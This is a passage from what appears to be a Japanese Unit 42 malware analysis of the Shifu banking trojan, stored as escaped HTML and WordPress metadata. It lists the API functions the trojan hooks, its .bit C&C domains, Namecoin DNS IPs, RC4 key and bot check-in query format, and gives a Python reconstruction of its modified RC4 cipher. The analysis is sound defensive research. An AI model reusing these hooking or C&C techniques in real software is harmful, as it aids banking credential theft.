\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001Web\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3092\u884c\u3046\u305f\u3081\u306b\u30c7\u30a3\u30b9\u30af\u306b\u683c\u7d0d\u3057\u307e\u3059\u3002\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u6bd4\u3079\u3066\u3001Zend PHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u5411\u3051\u306e\u7279\u5b9a\u306e\u6a5f\u80fd\u3092\u793a\u30592\u3064\u306e\u6587\u5b57\u5217\u304c\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u8ffd\u52a0\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">zend_stream_fixup<\/li>\n<li style=\"font-weight: 400;\">zend_compile_file<\/li>\n<\/ul>\n<h4>Svchost\u3067\u306e\u95a2\u6570\u306e\u30d5\u30c3\u30af<\/h4>\n<p style=\"font-weight: 400;\">\u524d\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3068\u540c\u69d8\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001URL\u306e\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af 
\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3084\u30af\u30ea\u30c3\u30d7\u30dc\u30fc\u30c9\u306e\u6355\u6349\u3001\u30ad\u30fc\u30b9\u30c8\u30ed\u30fc\u30af\u306e\u8a18\u9332\u3092\u884c\u3046\u305f\u3081\u306b\u3001\u3044\u304f\u3064\u304b\u306eAPI\u95a2\u6570\u3092\u30d5\u30c3\u30af\u3057\u307e\u3059\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30a4\u30f3\u30e9\u30a4\u30f3\u95a2\u6570\u30d5\u30c3\u30af\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u6280\u6cd5\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u306e\u6280\u6cd5\u3067\u306f\u3001\u3042\u308b\u95a2\u6570\u306e\u6700\u521d\u306e5\u30d0\u30a4\u30c8\u304c\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30d5\u30c3\u30af \u30cf\u30f3\u30c9\u30e9\u306b\u30b8\u30e3\u30f3\u30d7\u3059\u308b\u3088\u3046\u30d1\u30c3\u30c1\u9069\u7528\u3055\u308c\u307e\u3059\u3002\u6b21\u306e\u95a2\u6570\u304c\u30d5\u30c3\u30af\u3055\u308c\u307e\u3059\u3002<\/p>\n<ul>\n<li>NtDeviceIoControlFile (ntdll.dll)<\/li>\n<li>ZwDeviceIoControlFile (ntdll.dll)<\/li>\n<li>GetClipboardData (user32.dll)<\/li>\n<li>GetMessageA (user32.dll)<\/li>\n<li>GetMessageW (user32.dll)<\/li>\n<li>TranslateMessage (user32.dll)<\/li>\n<li>GetAddrInfoExW (ws2_32.dll)<\/li>\n<li>gethostbyname (ws2_32.dll)<\/li>\n<li>getaddrinfo (ws2_32.dll)<\/li>\n<\/ul>\n<h4>\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u6a5f\u80fd<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306e\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001.bit\u306e\u30c8\u30c3\u30d7\u30ec\u30d9\u30eb \u30c9\u30e1\u30a4\u30f3\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u3053\u308c\u306f\u3001Namecoin\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306b\u57fa\u3065\u3044\u305f\u4e00\u5143\u5316\u3055\u308c\u3066\u3044\u306a\u3044DNS\u30b7\u30b9\u30c6\u30e0\u3067\u3059\u3002\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u6b21\u306e\u30cf\u30fc\u30c9\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3055\u308c\u305fNamecoin 
DNS\u30b5\u30fc\u30d0\u306b\u5f8c\u3067\u63a5\u7d9a\u3059\u308b\u3053\u3068\u3067\u3001\u305d\u306e\u30c9\u30e1\u30a4\u30f3\u306eIP\u30a2\u30c9\u30ec\u30b9\u3092\u8981\u6c42\u3057\u307e\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">92.222.80.28<\/li>\n<li style=\"font-weight: 400;\">78.138.97.93<\/li>\n<li style=\"font-weight: 400;\">77.66.108.93<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">C&amp;C\u30c9\u30e1\u30a4\u30f3\u540d\u3001\u30e6\u30fc\u30b6\u30fc \u30a8\u30fc\u30b8\u30a7\u30f3\u30c8\u6587\u5b57\u5217\u3001\u304a\u3088\u3073URL\u30d1\u30e9\u30e1\u30fc\u30bf\u306f\u3001\u6539\u5909\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7528\u3044\u3066\u6697\u53f7\u5316\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u5fa9\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u306f\u6b21\u306e\u3068\u304a\u308a\u3067\u3059\u3002<\/p>\n<ul>\n<li style=\"font-weight: 400;\">klyatiemoskali.bit<\/li>\n<li style=\"font-weight: 400;\">slavaukraine.bit<\/li>\n<li style=\"font-weight: 400;\">Mozilla\/5.0 (Windows; U; Windows NT 5.2 x64; en-US; rv:1.9a1) Gecko\/20061007 Minefield\/3.0a1<\/li>\n<li style=\"font-weight: 400;\">L9mS3THljZylEx46ymJ2eqIdsEguKC15KnyQdfx4RTcVu8gCT<\/li>\n<li style=\"font-weight: 400;\">https:\/\/www.bing.com<\/li>\n<li style=\"font-weight: 400;\">\/english\/imageupload.php<\/li>\n<li style=\"font-weight: 400;\">\/english\/userlogin.php<\/li>\n<li style=\"font-weight: 400;\">\/english\/userpanel.php<\/li>\n<li style=\"font-weight: 400;\">1brz<\/li>\n<\/ul>\n<p style=\"font-weight: 400;\">\u6697\u53f7\u5316\u3055\u308c\u305f\u6587\u5b57\u5217\u306f\u3001.data\u30bb\u30af\u30b7\u30e7\u30f3\u5185\u3067\u6b21\u306e\u5f62\u5f0f\u3067\u683c\u7d0d\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"padding-left: 40px;\">&lt;LengthOfString&gt;&lt;EncryptedString&gt;<\/p>\n<p style=\"font-weight: 
400;\">\u30c9\u30e1\u30a4\u30f3\u6587\u5b57\u5217\u201cklyatiemoskali\u201d\u306f\u3001\u300c\u30e2\u30b9\u30af\u30ef\u5e02\u6c11\u306b\u707d\u3044\u3092\u300d\u3068\u3044\u3046\u3088\u3046\u306a\u610f\u5473\u3067\u3059\u30022\u756a\u76ee\u306e\u30c9\u30e1\u30a4\u30f3\u6587\u5b57\u5217\u201cslavaukraine\u201d\u306f\u3001\u300c\u30a6\u30af\u30e9\u30a4\u30ca\u306b\u6804\u5149\u3092\u300d\u3068\u8a33\u305b\u307e\u3059\u3002\u3053\u3053\u306b\u542b\u307e\u308c\u308bRC4\u9375\u201cL9mS3THljZylEx46ymJ2eqIdsEguKC15KnyQdfx4RTcVu8gCT\u201d\u3092\u4f7f\u7528\u3057\u3066\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u304c\u6697\u53f7\u5316\u3055\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">\u5206\u6790\u6642\u306b\u306f\u3001\u5b9f\u969b\u306eC&amp;C\u30b5\u30fc\u30d0\u306eIP\u30a2\u30c9\u30ec\u30b9\u306b\u5fdc\u7b54\u3057\u3066\u3044\u305f\u306e\u306f\u6b21\u306eNamecoin DNS\u30b5\u30fc\u30d0\u306e\u307f\u3067\u3057\u305f\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">77.66.108.93 (ns1.dk.dns.d0wn.biz)<\/p>\n<figure id=\"attachment_23093\" aria-describedby=\"caption-attachment-23093\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23093 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5.png\" alt=\"\u56f35 77.66.108.93\u306eNamecoin DNS\u30b5\u30fc\u30d0\u60c5\u5831\" width=\"945\" height=\"691\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-590x430.png 590w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-900x658.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-300x219.png 300w, 
https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-768x562.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_5-370x271.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23093\" class=\"wp-caption-text\">\u56f35 77.66.108.93\u306eNamecoin DNS\u30b5\u30fc\u30d0\u60c5\u5831<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">\u6b21\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u306f\u3001Shifu\u306e\u52d5\u7684\u5206\u6790\u6642\u306b\u6355\u6349\u3055\u308c\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_23090\" aria-describedby=\"caption-attachment-23090\" style=\"width: 945px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-23090 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6.png\" alt=\"\u56f36 Wireshark\u3067\u6355\u6349\u3055\u308c\u305fShifu\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\" width=\"945\" height=\"500\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-900x476.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-300x159.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-768x406.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_6-370x196.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><figcaption id=\"caption-attachment-23090\" class=\"wp-caption-text\">\u56f36 Wireshark\u3067\u6355\u6349\u3055\u308c\u305fShifu\u30cd\u30c3\u30c8\u30ef\u30fc\u30af 
\u30c8\u30e9\u30d5\u30a3\u30c3\u30af<\/figcaption><\/figure>\n<p style=\"font-weight: 400;\">IP\u30a2\u30c9\u30ec\u30b9\u3092\u53d6\u5f97\u3059\u308b\u305f\u3081\u306b\u3001Shifu\u304c\u30c9\u30e1\u30a4\u30f3\u540dklyatiemoskali.bit\u306eNamecoin DNS\u30b5\u30fc\u30d0\u3092\u554f\u3044\u5408\u308f\u305b\u305f\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\u30cd\u30fc\u30e0 \u30b5\u30fc\u30d0\u306e1\u3064\u304cC&amp;C\u30b5\u30fc\u30d0\u306eIP\u30a2\u30c9\u30ec\u30b9\u3067\u5fdc\u7b54\u3059\u308b\u3068\u3001TLS\u30cf\u30f3\u30c9\u30b7\u30a7\u30a4\u30af\u304c\u5b9f\u884c\u3055\u308c\u3066\u6697\u53f7\u5316\u3055\u308c\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c1\u30e3\u30cd\u30eb\u304c\u958b\u304b\u308c\u307e\u3059\u3002\u6700\u5f8c\u306b\u3001\u3044\u304f\u3064\u304b\u306e\u6697\u53f7\u5316\u3055\u308c\u305f\u30c7\u30fc\u30bf\u304c\u9001\u4fe1\u3055\u308c\u3001\u305d\u308c\u306b\u5bfe\u3059\u308b\u6697\u53f7\u5316\u3055\u308c\u305f\u5fdc\u7b54\u304c\u53d6\u5f97\u3055\u308c\u307e\u3059\u3002\u305f\u3060\u3057\u3001\u5206\u6790\u6642\u306b\u306f\u3001\u305d\u308c\u4ee5\u5916\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306f\u89b3\u5bdf\u3055\u308c\u306a\u304b\u3063\u305f\u306f\u305a\u3067\u3059\u3002\u5206\u6790\u6642\u306b\u306f\u3001\u30c9\u30e1\u30a4\u30f3\u540dklyatiemoskali.bit\u3068slavaukraine.bit\u304c\u3044\u305a\u308c\u3082\u3001IP\u30a2\u30c9\u30ec\u30b9103.199.16.106\u306b\u89e3\u6c7a\u3055\u308c\u305f\u306f\u305a\u3060\u304b\u3089\u3067\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">.bit\u306e\u30c8\u30c3\u30d7\u30ec\u30d9\u30eb \u30c9\u30e1\u30a4\u30f3\u306f\u3001Bitcoin\u30b7\u30b9\u30c6\u30e0\u306b\u57fa\u3065\u3044\u305fNamecoin\u6697\u53f7\u901a\u8ca8\u306b\u4f9d\u5b58\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u3059\u3079\u3066\u306e\u53d6\u5f15\u3092\u8ffd\u8de1\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u3064\u307e\u308a\u3001Namecoin\u30d6\u30ed\u30c3\u30af 
\u30a8\u30af\u30b9\u30d7\u30ed\u30fc\u30e9\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u3001.bit\u30c9\u30e1\u30a4\u30f3\u304c\u3044\u3064\u767b\u9332\u3055\u308c\u3001\u3069\u306eIP\u30a2\u30c9\u30ec\u30b9\u306b\u63a5\u7d9a\u3055\u308c\u3066\u3044\u308b\u304b\u3092\u8abf\u3079\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u3001Web\u30b5\u30fc\u30d3\u30b9namecha.in\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u3001klyatiemoskali.bit\u306b\u3064\u3044\u3066\u6b21\u306e\u60c5\u5831\u3092\u53d6\u5f97\u3067\u304d\u307e\u3059\u3002<\/p>\n<p><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7.png\" rel=\"wpdevart_lightbox\"><img  class=\"size-full wp-image-23087 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7.png\" alt=\"shifu_7\" width=\"945\" height=\"383\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7.png 945w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-900x365.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-300x122.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-768x311.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_7-370x150.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><br \/>\nslavaukraine.bit\u306b\u3064\u3044\u3066\u3082\u540c\u69d8\u306e\u60c5\u5831\u3092\u8868\u793a\u3067\u304d\u307e\u3059\u3002<br \/>\n<a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8.png\" rel=\"wpdevart_lightbox\"><img  class=\"size-full wp-image-23084 aligncenter lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8.png\" alt=\"shifu_8\" width=\"945\" height=\"380\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8.png 945w, 
https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-900x362.png 900w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-300x121.png 300w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-768x309.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2017\/01\/Shifu_8-370x149.png 370w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><\/p>\n<p style=\"font-weight: 400;\">\u3069\u3061\u3089\u306e\u30c9\u30e1\u30a4\u30f3\u30822016-06-03\u306b\u767b\u9332\u3055\u308c\u3066\u304a\u308a\u3001\u305d\u308c\u3089\u306b\u5272\u308a\u5f53\u3066\u3089\u308c\u3066\u3044\u308b\u306e\u306f1\u3064\u306eIP\u30a2\u30c9\u30ec\u30b9\u306e\u307f\u3067\u3059\u3002\u3053\u306eIP\u30a2\u30c9\u30ec\u30b9\u306f\u3001\u6355\u6349\u3055\u308c\u305f\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u306b\u304a\u3051\u308bNamecoin DNS\u30b5\u30fc\u30d0\u306e\u5fdc\u7b54\u306b\u76f8\u5f53\u3057\u307e\u3059\u3002\u3055\u3089\u306b\u3001\u30c9\u30e1\u30a4\u30f3\u304c\u307e\u3060\u30a2\u30af\u30c6\u30a3\u30d6\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3053\u3068\u3082\u78ba\u8a8d\u3067\u304d\u307e\u3059\u3002<\/p>\n<h4>C&amp;C\u30b5\u30fc\u30d0\u306eURL\u30af\u30a8\u30ea\u6587\u5b57\u5217<\/h4>\n<p style=\"font-weight: 400;\">\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u306f\u3001\u88ab\u5bb3\u8005\u306e\u60c5\u5831\u3092C&amp;C\u30b5\u30fc\u30d0\u306b\u9001\u4fe1\u3059\u308b\u969b\u306b\u4f7f\u7528\u3055\u308c\u308b\u30af\u30a8\u30ea\u6587\u5b57\u5217\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u304c\u542b\u307e\u308c\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=%s&amp;ver=%s.%u&amp;up=%u&amp;os=%u&amp;ltime=%s%d&amp;token=%d&amp;cn=%s&amp;av=%s&amp;dmn=%s&amp;mitm=%u<\/p>\n<p style=\"font-weight: 
400;\">\u4e00\u90e8\u306e\u60c5\u5831(\u30dc\u30c3\u30c8ID\u3001\u7a3c\u50cd\u6642\u9593\u3001\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0 \u30b7\u30b9\u30c6\u30e0 \u30d0\u30fc\u30b8\u30e7\u30f3\u3001\u30ed\u30fc\u30ab\u30eb \u30bf\u30a4\u30e0\u30b9\u30bf\u30f3\u30d7\u3001\u30c8\u30fc\u30af\u30f3\u3001\u30a2\u30f3\u30c1\u30a6\u30a4\u30eb\u30b9 \u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u3001\u30ef\u30fc\u30af\u30b9\u30c6\u30fc\u30b7\u30e7\u30f3\u306e\u30c9\u30e1\u30a4\u30f3\u540d\u3001\u691c\u51fa\u3055\u308c\u305f\u4e2d\u9593\u8005\u30a4\u30f3\u30bf\u30fc\u30bb\u30d7\u30b7\u30e7\u30f3)\u306f\u52d5\u7684\u306b\u53d6\u5f97\u3055\u308c\u308b\u3082\u306e\u306e\u3001\u30dc\u30c3\u30c8 \u30d0\u30fc\u30b8\u30e7\u30f3\u3084\u653b\u6483\u6d3b\u52d5\u540d\u306a\u3069\u306e\u9759\u7684\u306a\u5024\u3082\u9001\u4fe1\u3055\u308c\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\u4f5c\u6210\u3055\u308c\u305f\u30af\u30a8\u30ea\u6587\u5b57\u5217\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 40px;\">botid=26C47136!A5A4B18A!F2F924F2&amp;ver=1.759&amp;up=18294&amp;os=6110&amp;ltime=-8&amp;token=0&amp;cn=1brz&amp;av=&amp;dmn=&amp;mitm=0<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306e\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u201c1.759\u201d\u3067\u3001\u5f53\u8a72\u306e\u653b\u6483\u6d3b\u52d5\u540d\u306f\u201c1brz\u201d\u3067\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400;\">Shifu\u306e\u30af\u30a8\u30ea\u6587\u5b57\u5217\u3092\u30012014\u5e742\u6708\u306b\u8ffd\u8de1\u3057\u305f\u6700\u8fd1\u306eShiz\u30d0\u30fc\u30b8\u30e7\u30f3\u306e1\u3064(\u5185\u90e8\u30d0\u30fc\u30b8\u30e7\u30f35.6.25)\u3068\u6bd4\u8f03\u3059\u308b\u3068\u3001\u3053\u308c\u30892\u3064\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u306f\u985e\u4f3c\u6027\u304c\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002<\/p>\n<p style=\"font-weight: 400; padding-left: 
40px;\">botid=%s&amp;ver=5.6.25&amp;up=%u&amp;os=%03u&amp;ltime=%s%d&amp;token=%d&amp;cn=sochi&amp;av=%s<\/p>\n<h4>\u6539\u5909\u3055\u308c\u305fRC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0<\/h4>\n<p style=\"font-weight: 400;\">Shifu\u306f\u3001RC4\u6697\u53f7\u5316\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u6539\u5909\u3055\u308c\u305f\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u307e\u3059\u3002\u5f0a\u793e\u306fPython\u3067\u3053\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u518d\u69cb\u7bc9\u3059\u308b\u3053\u3068\u3067\u3001\u30e1\u30a4\u30f3 \u30da\u30a4\u30ed\u30fc\u30c9\u306b\u5b58\u5728\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u540d\u201cklyatiemoskali.bit\u201d\u304c\u3069\u306e\u3088\u3046\u306b\u6697\u53f7\u5316\u3055\u308c\u308b\u304b\u3092\u4f8b\u8a3c\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">import os\r\nimport binascii\r\n\r\n###initial values##########\r\nstring = \"klyatiemoskali.bit\"\r\nseed = \r\n\"fnbqooqdaixfueangywblgabirdgvkewdyqgfqaioluesyrpryfkjerfsouemaxnavrkguxmcmhckwprunurmhehclermtufwi\r\nyjbqhwlunbunuumeowfjmerxppxrgaxukyx\"\r\nbuffer = [0] * (len(string))\r\ntable_encr = [0] * 0x102\r\ntable_encr[0x100] = 1\r\ntable_encr[0x101] = 0\r\n###########################\r\n\r\n###string2buffer###########\r\ni = 0\r\nwhile (i&lt;len(string)):\r\n    char_1 = string[i]\r\n    int_1 = ord (char_1)\r\n    buffer[i] = int_1\r\n    i += 1\r\n###string2buffer###########\r\n\r\n###encryption table########\r\ni = 0\r\nwhile (i &lt; 0x100):\r\n    table_encr[i] = 0x000000ff&amp;i\r\n    i += 1\r\n\r\ni = 0\r\nj = 0\r\nwhile (i &lt; 0x100):\r\n    char_1 = seed[j]\r\n    int_2 = ord (char_1)\r\n    table_encr[i] ^= int_2\r\n    i += 1\r\n    j += 1\r\n    if (j == len(seed)):\r\n        j = 0\r\n###########################\r\n\r\n###encryption##############\r\nsize_1 = len(string)\r\ni = 0\r\nwhile (size_1 != 0):\r\n    byte_buf = buffer[i]\r\n    ind_1 = table_encr[0x100]\r\n    ind_2 = 
table_encr[ind_1]\r\n    ind_3 = 0x000000ff&amp;(ind_2 + table_encr[0x101])\r\n    ind_4 = 0x000000ff&amp;(table_encr[ind_3])\r\n    table_encr[ind_1] = ind_4\r\n    table_encr[ind_3] = ind_2\r\n    buffer[i] = 0x000000ff&amp;(table_encr[0x000000ff&amp;(ind_2 + ind_4)] ^ byte_buf)\r\n    table_encr[0x100] = 0x000000ff&amp;(ind_1 + 1)\r\n    table_encr[0x101] = ind_3\r\n    i += 1\r\n    size_1 -= 1\r\n\r\ni = 0\r\nstr_1 = \"\"\r\nwhile (i &lt; len(string)):\r\n    str_1 = str_1 + chr(buffer[i])\r\n    i += 1\r\n###########################\r\n    \r\n###output##################\r\nprint (\"Cleartext string: %s\" % string)\r\nprint (\"Encrypted: 0x%s\" % binascii.hexlify(str_1)) \r\n###########################\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 Shifu\u306f2015\u5e74\u306b\u521d\u3081\u3066\u767a\u898b\u3055\u308c\u305f\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u3067\u3042\u308a\u3001Zeus\u304c\u4f7f\u7528\u3057\u3066\u3044\u308b\u624b\u6cd5\u3092\u53d6\u308a\u8fbc\u3093\u3060Shiz\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306b\u57fa\u3065\u3044\u3066\u3044\u307e\u3059\u3002\u653b\u6483\u8005\u306fShifu\u3092\u4f7f\u7528\u3057\u3066\u4e16\u754c\u4e2d\u306e\u30aa\u30f3\u30e9\u30a4\u30f3 \u30d0\u30f3\u30ad\u30f3\u30b0\u306eWeb<\/p>\n","protected":false},"author":23,"featured_media":106755,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4324,4434,1974,4428],"tags":[6527,7492,6391,4783],"product_categories":[],"coauthors":[1025],"class_list":["post-106805","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybercrime","category-cybercrime-ja","category-malware-ja","category-threat-research-ja","tag-banking-ja","tag-shifu","tag-threat-research-ja","tag-trojan-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO 
v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0<\/title>\n<meta name=\"description\" content=\"\u6982\u8981\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shifu\u30d0\u30f3\u30ad\u30f3\u30b0\u578b\u30c8\u30ed\u30a4\u306e\u6728\u99ac\u306e2016\u5e74\u306e\u66f4\u65b0\" \/>\n<meta property=\"og:description\" content=\"\u6982\u8981\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-2016-updates-shifu-banking-trojan\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2017-01-06T20:00:36+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-27T04:49:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/04\/unit42-web-banner-650x300-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Unit 42\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. 
